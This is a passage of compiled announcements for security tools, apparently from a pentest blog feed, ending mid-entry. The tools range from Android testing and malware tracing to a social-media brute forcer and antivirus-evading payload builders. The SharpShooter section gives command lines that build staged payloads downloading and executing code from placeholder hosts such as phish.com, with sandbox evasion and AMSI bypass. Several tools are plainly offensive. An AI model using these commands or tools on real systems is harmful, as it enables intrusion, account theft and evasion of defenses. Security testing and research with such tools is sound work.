Drozer v2.4.4 – The Leading Security Assessment Framework For Android

drozer (formerly Mercury) is the leading security testing framework for Android.drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS.drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR’s advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).drozer is open source software, maintained by MWR InfoSecurity, and can be downloaded from: mwr.to/drozerPrerequisitesPython2.7Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable. Protobuf 2.6 or greater Pyopenssl 16.2 or greater Twisted 10.2 or greater Java Development Kit 1.7 Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.Android Debug BridgeInstallingBuilding Python wheelgit clone https://github.com/mwrlabs/drozer/cd drozerpython setup.py bdist_wheelInstalling Python wheelsudo pip install drozer-2.x.x-py2-none-any.whlBuilding for Debian/Ubuntu/Mintgit clone https://github.com/mwrlabs/drozer/cd drozermake debInstalling .deb (Debian/Ubuntu/Mint)sudo dpkg -i drozer-2.x.x.debBuilding for Redhat/Fedora/CentOSgit clone https://github.com/mwrlabs/drozer/cd drozermake rpmInstalling .rpm (Redhat/Fedora/CentOS)sudo rpm -I drozer-2.x.x-1.noarch.rpmBuilding for WindowsNOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn’t be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.git clone https://github.com/mwrlabs/drozer/cd drozerpython.exe setup.py bdist_msiInstalling .msi (Windows)Run dist/drozer-2.x.x.win-x.msi Arch Linuxyaourt -S drozerUsageInstalling the AgentDrozer can be installed using Android Debug Bridge (adb).Download the latest Drozer Agent here.$ adb install drozer-agent-2.x.x.apkStarting a SessionYou should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you’re ready to start exploring.We will use the server embedded in the drozer Agent to do this.If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:$ adb forward tcp:31415 tcp:31415Now, launch the Agent, select the “Embedded Server” option and tap “Enable” to start the server. You should see a notification that the server has started.Then, on your PC, connect using the drozer Console:On Linux:$ drozer console connectOn Windows:> drozer.bat console connectIf using a real device, the IP address of the device on the network must be specified:On Linux:$ drozer console connect –server Windows:> drozer.bat console connect –server should be presented with a drozer command prompt:selecting f75640f67144d9a3 (unknown sdk 4.1.1) dz>The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.You are now ready to start exploring the device.Command Reference Command Description run Executes a drozer module list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run. shell Start an interactive Linux shell on the device, in the context of the Agent process. cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module. clean Remove temporary files stored by drozer on the Android device. contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system. echo Print text to the console. exit Terminate the drozer session. help Display help about a particular command or module. load Load a file containing drozer commands, and execute them in sequence. module Find and install additional drozer modules from the Internet. permissions Display a list of the permissions granted to the drozer Agent. set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer. unset Remove a named variable that drozer passes to any Linux shells that it spawns. Contacting the Projectdrozer is Open Source software, made great by contributions from the community.For full source code, to report bugs, suggest features and contribute patches please see our Github project:https://github.com/mwrlabs/drozerBug reports, feature requests, comments and questions can be submitted here.Follow the latest drozer news, follow the project on Twitter:@mwrdrozerDownload Drozer

Link: http://feedproxy.google.com/~r/PentestTools/~3/gWlKeA3JnbA/drozer-v244-leading-security-assessment.html

Mail Security Tester – A Testing Framework For Mail Security And Filtering Solutions

A testing framework for mail security and filtering solutions.IMPORTANT: Don’t do anything evil with this! Tests of cloud or otherwise hosted solutions should always be approved by the tested provider. Only use your own test accounts and don’t annoy anyone with a load of test mails.InstallationThe mail security testing framework works with with Python >=3.5. Just pull this repository and go ahead. No further dependencies are required.UsageThe script mail-tester.py runs the tests. Read the help message with ./mail-tester.py –help and check the list of test and evasion modules with ./mail-tester.py -l to get an overview about the capabilities and the usage of the script. Some hints:At least the parameters –smtp-server and –to should be given for a minimal test run.All parameters can also be stored in configuration files without the prefix –. These configuration files can be used by invoking ./mail-tester.py @tester.conf (configuration contained in tester.conf).Multiple recipients can be configured with –to for testing of different filter configurations.Some mail filtering solutions may reject messages after a while. Use –auto-delay for automatic throttling of the mails. This can be fine-tuned with –delay-step, –delay-max and –delay.Some tests (Spam and Malware) require samples. Put these in directories and configure these directories with –spam-folder and –malware-folder parameters. The samples are not included in this repository (and will not be). Good places to get malware are theZoo, Das Malwerk or other collections. Spam can be exported straight from yout Spam folder, but must be in EML format.Blacklists can be supplied with the –blacklist parameter and are used as sender addresses.The Shellshock and subject XSS test cases should have a valid backconnect domain, where you are able to see any backconnects (especially DNS requests). The free Canary Tokens service can be used for this purpose. Thanks to Thinkst for providing this awesome service!Some neat attachment recognition evasion tricks can be enabled with –evasion content-disposition. These were used in the past to confuse AV/sandboxing solutions and let them pass malicious mails.Don’t forget to log the test results with –log. Mail filtering providers often reject mails in the SMTP dialog, which is reflected in the generated log.Test cases can be dumped with –output as plain files in a directory, in MBox (–mbox) or MailDir (–maildir) format. This is useful to test mail user agents without sending any mails, to document or review generated test cases.Development and ExtensionTestsOwn tests can be implemented with a class in one of the iexisting or newly created Python files in the tests/ directory. The class must be a subclass of MailTestBase located in the module tests.base of this project. Newly implemented tests are discovered automatically when the class variable active is set to True. Further (if you plan to contribute tests back to the main repository), the class variables identifier, name and description should be set appropriately.The following base classes exist with methods or class variables intended for overriding:MailTestBase: Test class for generic tests.generateTestCases(): Yields test messages. These should be generated with the MIME* classes from the Python email.mime.* packages or with the Message class from email.message to ensure valid mail messages.active: Boolean value if test should be active.identifier: Short identifier of the test. This one is used to enable or disable tests in parameters.name: Short test title.description: Longer test description, should fit within approximately 100 characters.delivery_sender and delivery_recipient: Boolean values, False by default. Normally, the sender and recipients are set in the message and the Python SMTP module takes them over from there. Sometimes it is desirable to set them explicitely in the SMTP library, which can be configured by setting this values to True.finalizeMessage(msg): By default, the base test class sets the From and To headers accrodingly. This behaviour can be overridden if required for the test case.MailAttachmentTestBase: Test class for attachment test cases. This generates a complete valid mail with a Subject and a text part and attaches the test case to it. Derived from MailTestBase, therefore the methods/variables from it can be overridden here, too.generateAttachments(): Yields test cases as (description, attachment) tuples.subject: Sets the subject. The place holder {} is replaced by the description yielded by generateAttachments().generateTestCases(): is already overridden with an implementation of the message generation described above, but may be further adapted if required.Setting the subjects of generated messages is highly recommended to be able to recongize the tests in the receiving inbox.EvasionsEvasion classes implement techniques for evading recognition of particular mail properties by mail security solutions. Currently, a evasion technique that tries to hide attachments from such solutions by intentionally broken Content-Disposition headers is implemented.Implement new EvasionsEvasions are implemented by a factory class pattern. The DeliveryBase class instantiaties a factory class derived from the BaseEvasionFactory class. The factory constructor receives a flag that indicates if the evasion is activated. The evasion factory instance is then passed to the test class and stored in its evasions attribute that contains a dict with the evasion identifiers as keys. Inside the test, a evasion class (based on EvasionBase) is instantiated with getEvasionGenerator(). The constructor parameter are defined individually per evasion technique.The following base classes are used to implement evasions:BaseEvasionFactory: Evasion factories must be based on this class. Usually, only the following class variables should be set:active: Set to True if the evasion should be active.identifier: Short identifier of the evasion module used for enabling it in the test configuration.name: Short title of the evasion technique.description: Longer description of the evasion technique. Should fit in approximately 100 characters.generator_evasion: Evasion class that is instantiated if the evasion is enabled.generator_default: Evasion class that is instantiated if the evasion is disabled.BaseEvasion: Implementation of evasions must be a subclass of this base class. The following method must be overridden:__init__(): Should instantiate the class with the base message or attachment that should be manipulated with evasion techniques.generate(): Apply the evasion technique to the object passed to the constructor and yield it to the caller as (description, object with evasion applied) tuple.Generally, the evasion class should yield all evasion variants and pass the default as dedicated test case, while the default evasion classes only pass the given object or create the required data structures, like headers.Using Evasion Techniques in Test CasesEvasion techniques are used in test cases where they are applicable. E.g. if an evasion technique manipulates the header of a mail or attachment, the following steps have to be implemented:Generate the base object (mail or attachment) without consideration of the evasion.Instantiate the appropriate evasion class by utilization of the evasion factory instance from self.evasions, e.g.: evasion_items = self.evasions[“evasion_identifier"].getEvasionGenerator(message)Iterate over the generator and yield the test cases:for evasion_item in evasion_items: yield evasion_itemUsage of the Content Disposition Evasion TechniqueThe content disposition evasion technique is already implemented in the framework and should be used for all test cases that target on the recognition of malicious attachments. The constructor receives an attachment and the intended file name. The evasion class then yields (evasion name, attachment with applied evasion technique) tuples that can directly be yielded by the tests generateAttachments() method.Download Mail-Security-Tester

Link: http://feedproxy.google.com/~r/PentestTools/~3/HrZh9xBkVuo/mail-security-tester-testing-framework.html

SocialBox – A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)

SocialBox is a Bruteforce Attack Framework [Facebook, Gmail, Instagram,Twitter], Coded By Belahsan Ouerghi.Installationsudo apt-get install gitsudo git clone https://github.com/TunisianEagles/SocialBox.gitcd SocialBoxchmod +x SocialBox.shchmod +x install-sb.sh./install-sb.sh./SocialBox.shScreenshots:Tested On :Backbox linuxUbuntuKali linuxContactContact – Belahsan OuerghiAuthors :facebook : Imadgmail : Ha3MrXinstagram : thelinuxchoiceTwitter : thelinuxchoiceSocialBox : Belahsan OuerghiDownload SocialBox

Link: http://feedproxy.google.com/~r/PentestTools/~3/t0v9oAV9ngc/socialbox-bruteforce-attack-framework.html

Drltrace – Drltrace Is A Library Calls Tracer For Windows And Linux Applications

Drltrace is a dynamic API calls tracer for Windows and Linux applications designed primarily for malware analysis. Drltrace is built on top of DynamoRIO dynamic binary instrumentation framework. The release build can be downloaded here.UsageThe usage of drltrace is very simple. A user needs to specify a log directory and a name of a target process in the following way:drltrace -logdir . — calc.exeThat’s all, the tool will inject required DLLs in the target process, starts instrumentation and in parallel will log information about all library calls which are executed in the target process:~~43600~~ msvcrt.dll!__wgetmainargs arg 0: 0x010d2364 arg 1: 0x010d2368 and return to module id:0, offset:0x193a~~43600~~ ntdll.dll!EtwEventRegister arg 0: 0x002ff994 arg 1: 0x010d1490 and return to module id:0, offset:0x157e~~43600~~ ntdll.dll!EtwEventSetInformation arg 0: 0x007b4b40 arg 1: 0x00000033 and return to module id:0, offset:0x15a1~~43600~~ SHELL32.dll!ShellExecuteW arg 0: (type=<unknown>, size=0x0) arg 1: <null> (type=wchar_t*, size=0x0) arg 2: calculator:// (type=wchar_t*, size=0x0) arg 3: <null> (type=wchar_t*, size=0x0) arg 4: <null> (type=wchar_t*, size=0x0) arg 5: 0x1 (type=int, size=0x4) and return to module id:0, offset:0x167dThe format of the output is simple and can be easily parsed by an external script:~~[thread id]~~ [dll name]![api call name]arg [arg #]: [value] (type=[Windows type name], size=[size of arg])and return to module id:[module unique id], offset:[offset in memory]The module unique identifiers table is printed at the end of the log file:Module Table: version 3, count 70Columns: id, containing_id, start, end, entry, checksum, timestamp, path 0, 0, 0x010d0000, 0x010da000, 0x010d1b80, 0x0000f752, 0xb5fe3575, C:\Windows\SysWOW64\calc.exe 1, 1, 0x6d4c0000, 0x6d621000, 0x6d563940, 0x00136d65, 0x59ce1b0b, C:\Users\Max\Downloads\drltrace\drltrace\dynamorio\lib32\release\dynamorio.dll 2, 2, 0x73800000, 0x73975000, 0x7380dbf7, 0x00000000, 0x59ce1b0f, C:\Users\Max\Downloads\drltrace\drltrace\bin\release/drltracelib.dll 3, 3, 0x742f0000, 0x742fa000, 0x742f2a00, 0x0000c877, 0x0adc52c1, C:\Windows\System32\CRYPTBASE.dll 4, 4, 0x74300000, 0x74320000, 0x7430c9b0, 0x0002c617, 0x245970b4, C:\Windows\System32\SspiCli.dll 5, 5, 0x74410000, 0x74431000, 0x74416900, 0x0002a940, 0x88a53c1d, C:\Windows\System32\GDI32.dll 6, 6, 0x74440000, 0x74500000, 0x7446fb20, 0x000cc410, 0xd343d532, C:\Windows\System32\RPCRT4.dll 7, 7, 0x74500000, 0x74525000, 0x745047d0, 0x00026737, 0xa39c8991, C:\Windows\System32\IMM32.DLL 8, 8, 0x74550000, 0x745c7000, 0x7456e8a0, 0x00081857, 0x73b971e1, C:\Windows\System32\advapi32.dll 9, 9, 0x748f0000, 0x74929000, 0x748febd0, 0x00045303, 0xa58be652, C:\Windows\System32\cfgmgr32.dll 10, 10, 0x74930000, 0x75c78000, 0x74aa09d0, 0x01377aa6, 0x4b39926b, C:\Windows\System32\SHELL32.dllDrltrace can easily filter out interlibrary calls and print only API calls performed from the main module (or from a heap) of a target application by specifying -only_from_app option which is very useful in case of applications that generate huge logs. Drltrace also has several useful external scripts to filter API calls for certain library, print only potentially interesting API calls and strings.LicenseDrltrace main modules are distrubuted under BSD.Some files required for drltrace are distrubuted under LGPL. See source files for more details.MotivationMalware analysis is not an easy task. Sophisticated software packers like Themida and Armadillo and of course dozens of unnamed packers written by malware authors plus code & data encryption significantly facilitate (in some cases making it completely impossible) static reverse engineering of such samples making life of malware analysts complicated. In such case, API calls tracing can significantly reduce amount of time required to understand an actual malicious intent and reveal a lot of technical details about protected malicious code.While traditional technique of API-hooking was successfully implemented in several solutions, the approach is well studied by malware authors and can be easily detected and/or bypassed. Moreover, these tools are distributed as standalone heavy-weight GUI applications (as proprietary products) which are not often easy to integrate within existent malware analysis workflow.If we look on Linux world, there is a wonderful tool called ltrace. Using a single bash command, we can easily get the full trace of API calls of a certain executable.Why don’t we have such tool (like ltrace in Linux) for Windows which is also transparent against anti-research tricks used by modern malware?It turns that there is a technique that can help us to have such tool for Windows and trace API calls transparently towards executed program. This technique is called dynamic binary instrumentation aka DBI. DBI is a technique of analyzing the behavior of a binary application at runtime through the injection of instrumentation code.However, application of DBI for malware analysis is undeservedly limited by unpacking automatization and several proofs of concepts for instructions, basic blocks and function calls tracing. As far as we know, drltrace is a first tool for API calls tracing based on DBI which can be used in practice for malware analysis. We provided several malware analysis examples in our wiki where we described how drltrace allowed to revel in several minutes a lot of internal technical details about sophisticated malicious samples without even starting IDA or debugger.Why Drltrace Rock ?Fast enough to perform analysis of malicious samples without being detected by time-based anti-research techniques.Supports both x86 and x64 (ARM in future).Supports both Windows and Linux (macOS in future).Supports self-modifying code.Supports all types of library linkage (static and dynamic).Not-detectable by standard anti-research approaches (anti-hooking, anti-debugging and anti-emulation).User can easily add a new function prototype to tell drltrace how to print more details about previously unknown API calls (even about non-system DLLs). External configuration file is used.Easy-to-use and modify for your own purposes (no additional package requirements, no heavy-weight GUI interface).Open-source, code is clear and well-documented. You can freely build & use your own advanced solution on top of drltrace.Command line options -logdir [ .] Log directory to print library call data -only_from_app [ false] Reports only library calls from the app -follow_children [ true] Trace child processes -print_ret_addr [ false] Print library call’s return address -num_unknown_args [ 2] Number of unknown libcall args to print -num_max_args [ 6] Maximum number of arguments to print -default_config [ true] Use default config file. -config [ “"] The path to custom config file. -ignore_underscore [ false] Ignores library routine names starting with "_". -only_to_lib [ ""] Only reports calls to the library <lib_name>. -help [ false] Print this message. -version [ false] Print version number. -verbose [ 1] Change verbosity. -use_config [ true] Use config fileConfiguration file syntaxDrltrace supports external configuration files where a user can describe how drltrace should print arguments for certain API calls.HANDLE|CreateRemoteThread|HANDLE|SECURITY_ATTRIBUTES*|size_t|THREAD_START_ROUTINE*|VOID*|DWORD|__out DWORD*Each function argument should be separated by |. The first argument is return type, the second argument is a function name itself and the rest are the function arguments. A token __out is used to mark output arguments and ___inout is used to mark input+output arguments.Malware Analysis ExamplesYou can find examples of how to use drltrace for analysis of complex malware at our Wiki page.Log VisualizationTo make the work with log files easier, we have implemented a script called api_calls_viz.py which can be used to generate RGB images where each pixel color represents unique API call. For example, the picture below represents log file of WannaCry malware.The large green areas on the picture represent API calls (wcscmp/wcsicmp) which are used to select files with interesting extensions (e.g. docx, xls, py) to encrypt them. The purple areas represent API calls (FindFirstFile/FindNextFile/CryptEncrypt) which are used to enumerate and encrypt files and folders on the disk.The script can also generate an HTML representation of generated RGB image where each element can be selected to show a name of API call.Raw HTML File.See the api_calls_viz directory for more details.How to BuildYou can find a detailed manual at this Wiki page.OS SupportWindows, Linux (macOS in future).CPU Architectures Supportx86, x64 (ARM on the list).LanguagesC and C++ standard library (and logs handling scripts written in Python).Technical DetailsWe decided to implement our API calls tracer on top of dynamic binary instrumentation framework DynamoRIO. Drltrace asks DynamoRIO to perform instrumentation of LoadLibrary call to be able to handle new libraries being loaded by the target process. When the process tries to load a new library, DynamoRIO redirects control flow to drltracelib.dll. In turn, drltrace enumerates exported functions in the newly loaded DLL and registers a special callback for each of them. Thus, if some exported function would be called by malware, drltrace’s callback will be executed before this function and the tool will be able to log all required information such as a function name and arguments. Another callback might be registered after the function to save results of execution.Why not Intel Pin ? We decided to use DynamoRIO motivated by the following reasons:The source code of DynamoRIO is available on github.com and distributed under BSD license while Intel Pin is a proprietary software.One of the basic requirements for DynamoRIO at the time of development was transparency towards the instrumented executable.DynamoRIO uses different technology of instrumentation based on code transformation while Intel PIN uses special trampolines which is not transparent towards analyzed executable and might be detected by malware.Future WorkWhile drltrace is not detectable by standard anti-research tricks, DBI-engine itself can be detected as shown in these works 1, 2. Making DynamoRIO resistant against these tricks is important path for future work.Currently, drltrace prints a raw log and provides several scripts to print important strings and library calls. In future, we plan to add heuristics (probably by applying YARA rules) to be able to select indicative behavior from malware automatically.Currently, DynamoRIO has beta support of ARM architecture, testing and porting drltrace on ARM is required.Drltrace doesn’t support situation when malware injects code in a remote process. In such cases, it is possible to tell DynamoRIO inject drltrace in all newly created processes (-syswide_on option of drrun.exe). However, in future, it is necessary to implement a special support in drltrace for such situations.Our issue tracker contains more details about future of drltrace.AcknowledgmentsMaksim Shudrak https://github.com/mxmsshDerek Bruening https://github.com/derekbrueningDownload Drltrace

Link: http://feedproxy.google.com/~r/PentestTools/~3/XHsufz6dWms/drltrace-drltrace-is-library-calls.html

Datasploit – An OSINT Framework To Perform Various Recon Techniques On Companies, People, Phone Number, Bitcoin Addresses, Etc., Aggregate All The Raw Data, And Give Data In Multiple Formats

Overview of the tool:Performs OSINT on a domain/email/username/phone and find out information from different sources.Correlate and collaborate the results, show them in a consolidated manner.Tries to find out credentials, api-keys, tokens, subdomains, domain history, legacy portals, etc. related to the target.Use specific script / launch automated OSINT for consolidated data.Performs Active Scans on collected data.Generates HTML, JSON reports along with text files.Basic Usage: ____/ /____ _ / /_ ____ _ _____ ____ / /____ (_)/ /_ / __ // __ `// __// __ `// ___// __ \ / // __ \ / // __/ / /_/ // /_/ // /_ / /_/ /(__ )/ /_/ // // /_/ // // /_ \__,_/ \__,_/ \__/ \__,_//____// .___//_/ \____//_/ \__/ /_/ Open Source Assistant for #OSINT website: www.datasploit.info Usage: domainOsint.py [options]Options: -h, –help show this help message and exit -d DOMAIN, –domain=DOMAIN Domain name against which automated Osint is to be performed.Required Setup:Python 2.7 (because bunch of dependencies do not support Python 3.0)Bunch of python libraries (use requirements.txt)In Kali Linux, please install the requirements using the command pip install –upgrade –force-reinstall -r requirements.txtDetailed Tool Documentation:https://datasploit.github.io/datasploit/Lead DevelopersShubham Mittal – https://github.com/upgoingstarSudhanshu Chauhan – https://github.com/sudhanshucKunal Aggarwal – https://github.com/KunalAggarwalDownload Datasploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/JzY2et0Z1_o/datasploit-osint-framework-to-perform.html

Laforge – Security Competition Infrastructure Automation Framework

Laforge enables rapid development of infrastructure for the purpose of information security competitions. Using a simple and intuitive configuration language, Laforge manages a dependency graph and state management and allows for highly productive remote collaboration. The Laforge engine uses a custom loader to do multi-dimensional, non-destructive configuration overlay. A good analogy to this is Docker – when you build a Docker container, it builds it up layers at a time. It’s this power that has inspired us to build Laforge. It’s certainly a niche` project, but we certainly have found an incredible use for it.FeaturesCross platformPortable – installs as a stand alone native executable.Use what you enjoy – Bring Your Own Scripting Language (Y)Fast.Build once, clone to n number of teams (security competitions paradigm)Collaborative – makes working in distributed groups very efficientFAQWhat is Laforge?Laforge is a framework that lets you design and implement security competitions in a scalable, collaborative, and fun way! You write configurations in Laforge Config Language and use the CLI tool to inspect, validate, build, and connect to remote infrastructure with. Historically, it’s primarily supported Terraform as it’s “backend" (generates sophisticated terraform configurations), but this will be changing rapidly over the coming weeks and months. Laforge currently powers all of the infrastructure management for the National Collegiate Penetration Testing Competition and has supported game deployments of >1400 unique nodes.Why was it created?Three reasons:Security professionals aren’t the most well versed with operations/infrastructure/devops tools. They have a steeper than most learning curve, especially when asking volunteers to try and figure it out in their off work time. To make it easier for people, we wanted to make a tool that basically did the hard part for them.As we dug in, we noticed that the commonly used automation frameworks available had a number of painpoints when it came to building security competition infrastructure. There are things that have to occur in security competitions that aren’t supported in the real world:wide compatibility with lots of operating systems and softwareMass "clone" ability – snapshot a game infra and clone it 10-20x – one for each team.Flexibility to deploy the same stacks to a wide set of possible infrastructure – VMWare, AWS, GCP, etc.Because competitions deserve it! We work with some of the most passionate people on these projects and anything that can make our shared experience better is a win win in our book.Why not current DevOps tools?No need to go into a flame war over this tool or that. We frankly like them. Our biggest complaint across the board is that given how fragmented they are, it’s hard to ever be really good at any one of them. We enjoy Terraform and it’s been our primary backend since the beginning.How does it scale?We have used the various iterations of LaForge to generate competition environments with hundreds of total hosts for almost 30 teams. In short, it can scale as large as your imagination (and budget / resources) allows. Furthermore, we have used this tool across a team of over 15 volunteer developers each working on their own components and have used that feedback in the most recent versions.What about performance?Depending on the complexity of your environment, building LaForge output may take seconds or minutes. In the end you will spend more time spinning up systems in the environment of your choice with Terraform or Vagrant than you will generating the relevant configurations for either of them.Is it production-ready?If by production, you mean developing live competition environments, LaForge has been used for over three years in a "production" capacity. If you mean live systems at your company or organization, it will probably work well, but use at your own risk.Installation$ go get github.com/gen0cide/laforge/cmd/laforgeQuick Startlaforge configurelaforge initlaforge example Object ModelsNetworkScriptEnvironmentAMIDNS RecordIdentityCommandRemote FileHostRoadmapReplace YAMLLanguage DefinitionConfiguration SemanticsParser & LexerDependency Chaining & MgmtLoaderGraph RelationshipsObject DefinitionsReplace CLIbuild subcommandconfigure subcommanddeps subcommanddownload subcommanddump subcommandenv subcommandexample subcommandexplorer subcommandinit subcommandquery subcommandserve subcommandshell subcommandstatus subcommandupload subcommandReplace Rendering EngineBuilder interface designedNew BuildEngine doneBuildIssue error typevalidations packagenull builder implementation (spec as of now)Template engine WIPBackendsTerraformVagrantNative (pure scripts & laforge)AWS-SDKDockerBugsIt’s literally an alpha preview, there definitely are some.EnhancementsPerformanceExplore more concurrency pipelines in the loader and builderUI/UX ImprovementsMore documentation +++More examples ++Laforge Web UIMoonshotsLaforge Server & GatewayCnditional Logic in SyntaxRemote IncludesHall of Famementors, contributors, and great friends of [email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@javutoAcknowledgementsNational CPTC and the CPTC Advisory Board who’s been so patient with me as I worked through this.Rochester Institute of Technology For giving us a place to expiriment and advance both the technology as well as the workforce of our industry.Download Laforge

Link: http://feedproxy.google.com/~r/PentestTools/~3/VXa3BkeqvAM/laforge-security-competition.html

Ducky-Exploit – Arduino Rubber Ducky Framework

Ducky Exploit is python framework which helps as to code Digispark as Rubber Ducky.This script has been tested onKali Linux 18.2Ubuntu 18.04WindowsWorks with both Python2 and Python3InstallationUbuntu and KaliUsagegit clone https://github.com/itsmehacker5/Ducky-Exploit.gitcd Ducky-Exploit/python ducky.pyScreenshotsDownload Ducky-Exploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/dpmpyqXXtco/ducky-exploit-arduino-rubber-ducky.html

ASWCrypter – An Bash&Python Script For Generating Payloads that Bypasses All Antivirus

An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD].PLEASE DON’T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM ImportantThis Version Just for test , In future I will update ASWCrypter to generate a payloads for linux ,Mac and Windows . ;)Legal Disclamer:The author does not hold any responsibility for the bad use of this tool, remember this is only for educational purpose.Requirements1- Metasploit Framework 2- PythonGetting Startedgit clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.gitcd ASWCrypterchmod +x setup.sh or chmod 777 setup.shScreenshotDownload ASWCrypter

Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html

SharpShooter – Payload Generation Framework

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw’s DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp’s CodeDom provider.Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.SharpShooter targets v2, v3 and v4 of the .NET framework which will be found on most end-user Windows workstations.Version 1.0 of SharpShooter introduced several new concepts, including COM staging, execution of Squiblydoo and Squiblytwo, as well as XSL execution. To acomplish this new functionality, several new flags were added; –com, –awl and –awlurl.Further information can be found on the MDSec blog post.Usage – Command Line Mode:SharpShooter is highly configurable, supporting a number of different payload types, sandbox evasions, delivery methods and output types.Running SharpShooter with the –help argument will produce the following output:usage: SharpShooter.py [-h] [–stageless] [–dotnetver ] [–com <com>] [–awl <awl>] [–awlurl <awlurl>] [–payload <format>] [–sandbox <types>] [–amsi <amsi>] [–delivery <type>] [–rawscfile <path>] [–shellcode] [–scfile <path>] [–refs <refs>] [–namespace <ns>] [–entrypoint <ep>] [–web <web>] [–dns <dns>] [–output <output>] [–smuggle] [–template <tpl>]optional arguments: -h, –help show this help message and exit –stageless Create a stageless payload –dotnetver <ver> Target .NET Version: 2 or 4 –com <com> COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote –awl <awl> Application Whitelist Bypass Technique: wmic, regsvr32 –awlurl <awlurl> URL to retrieve XSL/SCT payload –payload <format> Payload type: hta, js, jse, vba, vbe, vbs, wsf –sandbox <types> Anti-sandbox techniques: [1] Key to Domain (e.g. 1=CONTOSO) [2] Ensure Domain Joined [3] Check for Sandbox Artifacts [4] Check for Bad MACs [5] Check for Debugging –amsi <amsi> Use amsi bypass technique: amsienable –delivery <type> Delivery method: web, dns, both –rawscfile <path> Path to raw shellcode file for stageless payloads –shellcode Use built in shellcode execution –scfile <path> Path to shellcode file as CSharp byte array –refs <refs> References required to compile custom CSharp, e.g. mscorlib.dll,System.Windows.Forms.dll –namespace <ns> Namespace for custom CSharp, e.g. Foo.bar –entrypoint <ep> Method to execute, e.g. Main –web <web> URI for web delivery –dns <dns> Domain for DNS delivery –output <output> Name of output file (e.g. maldoc) –smuggle Smuggle file inside HTML –template <tpl> Name of template file (e.g. mcafee)Examples of some use cases are provided below:Stageless JavaScriptSharpShooter.py –stageless –dotnetver 4 –payload js –output foo –rawscfile ./raw.txt –sandbox 1=contoso,2,3Create a stageless JavaScript payload targeting version 4 of the .NET framework. This example will create a payload named foo.js in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by keying execution to the CONTOSO domain, and checking for known sandbox/VM artifacts.Stageless HTASharpShooter.py –stageless –dotnetver 2 –payload hta –output foo –rawscfile ./raw.txt –sandbox 4 –smuggle –template mcafeeCreate a stageless HTA payload targeting version 2/3 of the .NET framework. This example will create a payload named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by checking for known virtual MAC addresses. A HTML smuggling payload will also be generated named foo.html in the output directory. This payload will use the example McAfee virus scan template.Staged VBSSharpShooter.py –payload vbs –delivery both –output foo –web http://www.foo.bar/shellcode.payload –dns bar.foo –shellcode –scfile ./csharpsc.txt –sandbox 1=contoso –smuggle –template mcafee –dotnetver 4This example creates a staged VBS payload that performs both Web and DNS delivery. The payload will attempt to retrieve a GZipped CSharp file that executes the shellcode supplied as a CSharp byte array in the csharpsc.txt file. The CSharp file used is the built-in SharpShooter shellcode execution template. The payload is created in the output directory named foo.payload and should be hosted on http://www.foo.bar/shellcode.payload. The same file should also be hosted on the bar.foo domain using PowerDNS to serve it. The VBS file will attempt to key execution to the CONTOSO domain and will be embedded in a HTML file using the HTML smuggling technique with the McAfee virus scanned template. The resultant payload is stored in the output directory named foo.html.Custom CSharp inside VBSSharpShooter.py –dotnetver 2 –payload js –sandbox 2,3,4,5 –delivery web –refs mscorlib.dll,System.Windows.Forms.dll –namespace MDSec.SharpShooter –entrypoint Main –web http://www.phish.com/implant.payload –output malicious –smuggle –template mcafeeThis example demonstrates how to create a staged JS payload that performs web delivery, retrieving a payload from http://www.phish.com/implant.payload. The generated payload will attempt sandbox evasion, and attempt to compile the retrieved payload which requires mscorlib.dll and System.Windows.Forms.dll as DLL references. The Main method in the MDSec.SharpShooter namespace will be executed on successful compilation.Creation of a Squiblytwo VBSSharpShooter.py –stageless –dotnetver 2 –payload vbs –output foo –rawscfile ./x86payload.bin –smuggle –template mcafee –com outlook –awlurl example creates a VBS smuggled COM stager that uses the Outlook.CreateObject() COM method as a primitive to execute wmic.exe to execute a hosted stylesheet. The –awl parameter is not used by defaults to wmic.Creation of a XSL HTASharpShooter.py –stageless –dotnetver 2 –payload hta –output foo –rawscfile ./x86payload.bin –smuggle –template mcafee –com xslremote 